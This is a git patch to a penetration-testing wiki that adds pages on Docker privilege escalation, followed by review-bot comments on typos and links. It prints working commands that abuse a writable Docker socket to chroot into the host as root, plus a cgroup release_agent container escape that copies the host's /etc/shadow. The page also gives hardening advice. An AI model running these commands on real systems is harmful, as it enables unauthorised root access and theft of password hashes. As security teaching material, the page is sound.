From 6283f1edf11484b73add79fcc5f829fd4f7e59b0 Mon Sep 17 00:00:00 2001 From: CPol Date: Wed, 26 Aug 2020 15:52:43 +0000 Subject: [PATCH] GitBook: [master] 366 pages modified --- SUMMARY.md | 1 + linux-unix/privilege-escalation/README.md | 13 ++++++ .../escaping-from-a-docker-container.md | 42 +++++++++++++++++++ .../interesting-groups-linux-pe/README.md | 11 ++--- 4 files changed, 59 insertions(+), 8 deletions(-) create mode 100644 linux-unix/privilege-escalation/escaping-from-a-docker-container.md diff --git a/SUMMARY.md b/SUMMARY.md index c9a24324..3294ea67 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -20,6 +20,7 @@ * [Checklist - Linux Privilege Escalation](linux-unix/linux-privilege-escalation-checklist.md) * [Linux Privilege Escalation](linux-unix/privilege-escalation/README.md) + * [Escaping from a Docker container](linux-unix/privilege-escalation/escaping-from-a-docker-container.md) * [Cisco - vmanage](linux-unix/privilege-escalation/cisco-vmanage.md) * [D-Bus Enumeration & Command Injection Privilege Escalation](linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md) * [Escaping from restricted shells - Jails](linux-unix/privilege-escalation/escaping-from-limited-bash.md) diff --git a/linux-unix/privilege-escalation/README.md b/linux-unix/privilege-escalation/README.md index ffe6f83a..b609e9f9 100644 --- a/linux-unix/privilege-escalation/README.md +++ b/linux-unix/privilege-escalation/README.md 
@@ -463,6 +463,19 @@ curl --max-time 2 --unix-socket /pat/to/socket/files http:/index If the socket **respond with a HTTP** request, then you can **communicate** with it and maybe **exploit some vulnerability**. +### Writable Docker Socket + +The **docker socke**t is typically located at `/var/run/docker.sock` and is only writable by `root` user and `docker` group. +If for some reason **you have write permissions** over that socket you can escalate privileges. +The following commands can be used to escalate privileges: + +```bash +docker -H unix:///var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash +docker -H unix:///var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh +``` + +Note that if you have write permissions over socket because you are **inside the group `docker`** you have [**more ways to escalate privileges**](interesting-groups-linux-pe/#docker-group). + ## **D-Bus** D-BUS is an **inter-process communication \(IPC\) system**, providing a simple yet powerful mechanism **allowing applications to talk to one another**, communicate information and request services. D-BUS was designed from scratch to fulfil the needs of a modern Linux system. diff --git a/linux-unix/privilege-escalation/escaping-from-a-docker-container.md b/linux-unix/privilege-escalation/escaping-from-a-docker-container.md new file mode 100644 index 00000000..583826d7 --- /dev/null +++ b/linux-unix/privilege-escalation/escaping-from-a-docker-container.md 
@@ -0,0 +1,42 @@ +# Escaping from a Docker container + +### SYS\_ADMIN capability and AppArmor disabled + +{% hint style="info" %} +Note that these aren't default settings +{% endhint %} + +```text +docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash +``` + +Then in the container, we are going to run these commands. + +```text +mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x +echo 1 > /tmp/cgrp/x/notify_on_release +host_path=`sed -n ‘s/.*\perdir=\([^,]*\).*/\1/p’ /etc/mtab` +echo “$host_path/cmd” > /tmp/cgrp/release_agent +echo ‘#!/bin/sh’ > /cmd +echo “cat /etc/shadow > $host_path/shadow” >> /cmd +chmod a+x /cmd +sh -c “echo \$\$ > /tmp/cgrp/x/cgroup.procs” +``` + +Once you execute the above commands, you can see the host OS’s passwords in /shadow folder + +```text +cat /shadow +``` + +As we can see we were able to break out of the container. Suffice to say, we abused misconfigurations to escape a container. +This wouldn’t have happened if the non-root user was used, SYS\_ADMIN and AppArmor profile wasn’t disabled. +In short, + +1. Do not use –privileged flag, it disables all the security mechanisms placed by docker. +2. Do not mount root volumes into the containers. +3. Do not mount docker.sock inside the containers. +4. Default docker settings are sane, please do not disable them or add more capabilities. +5. Use SecComp and AppArmor profiles to harden the container. +6. Do not run containers as the root user. + diff --git a/linux-unix/privilege-escalation/interesting-groups-linux-pe/README.md b/linux-unix/privilege-escalation/interesting-groups-linux-pe/README.md index 62b25455..05b311a7 100644 --- a/linux-unix/privilege-escalation/interesting-groups-linux-pe/README.md +++ b/linux-unix/privilege-escalation/interesting-groups-linux-pe/README.md 
@@ -158,7 +158,9 @@ find / -group root -perm -g=w 2>/dev/null ## Docker Group -You can mount the root filesystem of the host machine to an instance’s volume, so when the instance starts it immediately loads a `chroot` into that volume. This effectively gives you root on the machine. +You can **mount the root filesystem of the host machine to an instance’s volume**, so when the instance starts it immediately loads a `chroot` into that volume. This effectively gives you root on the machine. + +You can start reading [**this post about how to escalate privileges abusing the docker socket where you have write permissions**](../#writable-docker-socket). {% embed url="https://github.com/KrustyHack/docker-privilege-escalation" %} @@ -197,13 +199,6 @@ sh-5.0# id uid=0(root) gid=0(root) groups=0(root) ``` -More docker privilege escalation using the Docker Socket. - -```text -sudo docker -H unix:///google/host/var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash -sudo docker -H unix:///google/host/var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh -``` - ## lxc/lxd Group {% page-ref page="./" %}
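Review bot: in the README.md hunk (new "Writable Docker Socket" section) the bold span `**docker socke**t` closes one character early, so the rendered text shows "docke**t"; the closing `**` belongs after "socket". The same sentence should read "is only writable by the `root` user and the `docker` group". The section would also benefit from one sentence saying what the two `docker -H unix:///var/run/docker.sock ...` commands require in order to run at all: the `docker` client binary on the box and a daemon actually listening on that socket, since a writable socket with no daemon behind it gives nothing, and a reader who gets a connection error otherwise has no way to tell which precondition failed.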
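Review bot: the second code block in the new `escaping-from-a-docker-container.md` uses typographic quotes (‘ ’ “ ”) on the `sed`, `echo` and `sh -c` lines, so the commands do not behave as written when pasted into a shell; they should be ASCII `'` and `"`. Both blocks are fenced as ```text while the README.md hunk in this same patch uses ```bash, and item 1 of the hardening list has an en dash in `–privileged` where `--privileged` is meant. The sentence "you can see the host OS’s passwords in /shadow folder" is inaccurate on two counts: what the `echo “cat /etc/shadow > $host_path/shadow” >> /cmd` line writes is a copy of the host's `/etc/shadow` file (password hashes, not passwords) at the file path `/shadow` on the host, not a folder. The sentence "This wouldn’t have happened if the non-root user was used, SYS\_ADMIN and AppArmor profile wasn’t disabled" needs rewording, e.g. "This would not have been possible if the container had run as a non-root user, without `SYS_ADMIN`, and with the AppArmor profile left enabled", which also matches the `{% hint %}` at the top saying these are not default settings.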
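Review bot: in the first `interesting-groups-linux-pe/README.md` hunk the new link `[...](../#writable-docker-socket)` points at a parent-directory anchor derived from the `### Writable Docker Socket` heading added to `linux-unix/privilege-escalation/README.md`; please confirm GitBook resolves the `../#` form in the built site, since a broken anchor here silently lands the reader at the top of a very long page. The bolding added to the first paragraph is cosmetic and fine.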
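Review bot: the block removed in the second `interesting-groups-linux-pe/README.md` hunk was the only place that mentioned a non-default socket path, `/google/host/var/run/docker.sock`, whereas the README.md section the commands were moved to says only that the socket "is typically located at `/var/run/docker.sock`". If that path was intentional (a host socket exposed inside a container at a different mount point), keep one sentence in the Docker Group section noting that the socket may live elsewhere and that the `-H unix://` argument has to point at the actual path; otherwise the de-duplication is a good change. Dropping the `sudo` prefix in the moved copy is consistent with the new section's premise, which is that the caller already has write access to the socket without being root.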